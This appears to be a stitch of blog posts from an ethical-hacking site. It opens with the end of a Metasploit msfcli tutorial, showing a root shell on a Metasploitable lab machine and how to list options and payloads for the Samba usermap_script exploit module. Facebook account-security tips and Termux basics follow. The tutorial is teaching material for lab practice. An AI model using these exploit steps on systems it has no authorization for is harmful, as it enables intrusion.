[*] Command shell session 1 opened (172.16.194.163:4444 -> 172.16.194.172:57682) at 2012-06-14 09:58:19 -0400
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
If you aren’t entirely sure about what options belong to a particular module, you can append the letter O to the end of the string at whichever point you are stuck.
root@kali:~# msfcli exploit/multi/samba/usermap_script O
[*] Initializing modules...
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST                   yes       The target address
RPORT  139              yes       The target port
To display available payloads for the current module, append the letter P to the msfcli command line string.
root@kali:~# msfcli exploit/multi/samba/usermap_script P
Benefits of the MSFcli Interface
Supports the launching of exploits and auxiliary modules
Useful for specific tasks
Good for learning
Convenient to use when testing or developing a new exploit
Good tool for one-off exploitation
Excellent if you know exactly which exploit and options you need
Wonderful for use in scripts and basic automation
The only real drawback of msfcli is that it is not supported quite as well as msfconsole and it can only handle one shell at a time, making it rather impractical for client-side attacks.
It also doesn’t support any of the advanced automation features of msfconsole.
Congratulations, you have reached the end. Hope now you know what Metasploit is. If you have a question, don’t keep it to yourself; share it with us. For more information, go to the Offensive Security official page.
Did you know that most Facebook accounts are hacked by bad guys?
Facebook is a popular free social networking website that allows registered users to create profiles, upload photos, and videos, send messages and keep in touch with friends, family, and colleagues. The site, which is available in 37 different languages, includes public features such as:
Marketplace: it allows members to post, read and respond to classified ads.
Groups: it allows members who have common interests to find each other and interact.
Events: it allows members to publicize an event, invite guests and track who plans to attend.
Pages: it allows members to create and promote a public page built around a specific topic.
Presence technology – allows members to see which contacts are online and chat.
Most Facebook accounts are hacked by bad guys who are looking for some information or just playing with hacking techniques without even any profit from it. Also, others hack Facebook accounts and take over your Facebook page, if it has many likes and followers, for their future profit. So if you don’t want to be a future victim of Facebook account hackers, read this till the end.
Although Facebook is more secure, there are some techniques hackers use to hack Facebook accounts, like phishing, keylogging, Trojans/backdoors, sniffing, social engineering, and session hijacking …
Log out of Facebook when you are sharing the same computer with someone.
Also, it’s recommended to always log out of your account if it’s not being used on your own phone or PC. Sometimes you may be using a friend’s phone; don’t forget to check that you have really logged out and deleted all your information from that phone or PC.
Don’t accept friend requests from people you don’t know
Scammers may create fake accounts to friend people.
Becoming friends with scammers might allow them to spam your timeline, tag you in posts and send you malicious messages.
Keep your browser up to date
Also, you must keep your web browser up to date and remove suspicious applications or browser add-ons.
This includes links on Facebook (example: on posts) or in emails.
Keep in mind that Facebook will never ask you for your password in an email.
If you see a suspicious link on Facebook, you can report it
Use Facebook extra security options
You can also get alerts about unrecognized logins, and set up two-factor authentication.
If you’re logged in to Facebook on a computer, you can use Security Checkup to review your security settings.
Note: This feature is currently available to people logged into Facebook on a computer or the latest version of Facebook for Android or Facebook for iOS app.
Note also that Facebook uses HTTPS. Secure browsing (HTTPS) is a security feature that automatically encrypts your connection to Facebook. This helps protect your account by making it harder for anyone to access your Facebook information without your permission.
In addition, a secure connection is required to connect to Facebook and can’t be turned off.
Congratulations, you have reached the end of this post. Hope you have enjoyed it and are now able to protect yourself against scammers. If you have any questions or suggestions, let us know.
Accessing and managing file – Termux for ethical hacking
Now let us see how we can manage and access files in Termux. There are three main types of storage in Termux.
Internal storage: files in $HOME, available from inside Termux or when explicitly picked in a SAF-compatible file manager.
Shared storage: general-purpose file storage available for all applications. You need to grant Termux storage access permission to use it.
External storage: external SD cards or USB hard drives. Typically read-only, except the Termux private directory.
Full read-write access to external SD cards and USB drives is available only on rooted devices. For those who are curious why some applications can write on external storage without restriction: these applications use special APIs (Storage Access Framework) not available for command line applications.
Also, Shared storage as well as external storage is not suitable for installing software. Do not even try to move Termux directories like $HOME or $PREFIX onto this kind of storage.
Access shared and external storage
Then, to access shared and external storage you need to run termux-setup-storage. You will then be prompted to “Allow Termux access photos, media and files on your device”, which you should allow.
Also, if you have the Termux:API application and the termux-api package installed, you can use the Android file picker to get any file from either shared or external storage by using the utility termux-storage-get.
You can also access the Termux home directory ($HOME) from a file manager that uses the Storage Access Framework and is capable of accessing drives such as USB or external SD cards in read-write mode.
Also, use ls to show the directory content, and cd if you want to change the directory, e.g. cd $HOME. Then, use pwd to display the path of the current directory, and use cd /sdcard if you want to access your memory card.
Text Editor – Termux for ethical hacking
Now that we have seen how we can access and manage files on Termux, let us look at text editors on Termux. Also, in my previous article we discussed the differences between Termux and Linux; you can have a look at it if you are curious.
A text editor is a system or program that allows a user to edit text. It is a type of program used for editing plain text files. Here is a list of some text editors on Termux.
Nano: is a small and friendly editor. It copies the look and feel of Pico, but is free software, and implements several features that Pico lacks, such as opening multiple files, scrolling per line, undo/redo, syntax coloring, line numbering, and soft-wrapping overlong lines. You can install it using pkg install nano
Vim: Vim is a highly configurable text editor built to make creating and changing any kind of text very efficient. It is included as “vi” with most UNIX systems and with Apple OS X. Also, you can visit the vim Homepage: https://www.vim.org/
Now let us discuss a little about networking on Termux. Networking is the exchange of information and ideas among people with a common profession or special interest, usually in an informal social setting. Also, networking often begins with a single point of common ground.
ifconfig is used to check everything related to your IP address. Also, the command ping helps to check any website’s IP address. Example: ping “name_of_web_site”, e.g. ping www.google.com
Also, Termux gives the possibility of accessing the internet using w3m. The command pkg install w3m is used to install w3m for accessing the internet on Termux. Example: w3m “website address”, e.g. w3m tgeniusclub.com
Additionally, the command pkg install lynx is used to install lynx, which has the same functionality as w3m; type lynx “website”.
Installing python in termux
Python is an interpreted, high-level, general-purpose programming language. Created by Guido van Rossum and first released in 1991, Python’s design philosophy emphasizes code readability with its notable use of significant whitespace. Its language constructs and object-oriented approach aim to help programmers write clear, logical code for small and large-scale projects.
When it comes to installing Python on Termux, there are 2 choices: either you install Python 3.x or Python 2.7.x. Let us see the different ways to install Python.
First, to install Python 3.x, open Termux and type pkg install python. This command will install Python 3.x on your Termux, and it will be ready to be used.
Lastly, to install Python 2.7.x, open Termux and type pkg install python2. This command will install Python 2.7.x on your Termux, and it will be ready to be used.
Warning: upgrading major/minor versions of the Python package, for example from Python 3.8 to 3.9, will make all your currently installed modules unusable. You will need to reinstall them. However upgrading patch versions, for example from 3.8.1 to 3.8.2, is safe.
The programming language in termux
Termux is often used for software development and information science education. Also, you might be surprised that almost all languages are usable on Termux. Termux is such a powerful Linux environment that it can handle the above programming languages.
Also, use this command: pkg install clang. It is used to install C and C++. During installation it will ask whether you allow Termux to use some space on your phone; type “y”, then press Enter.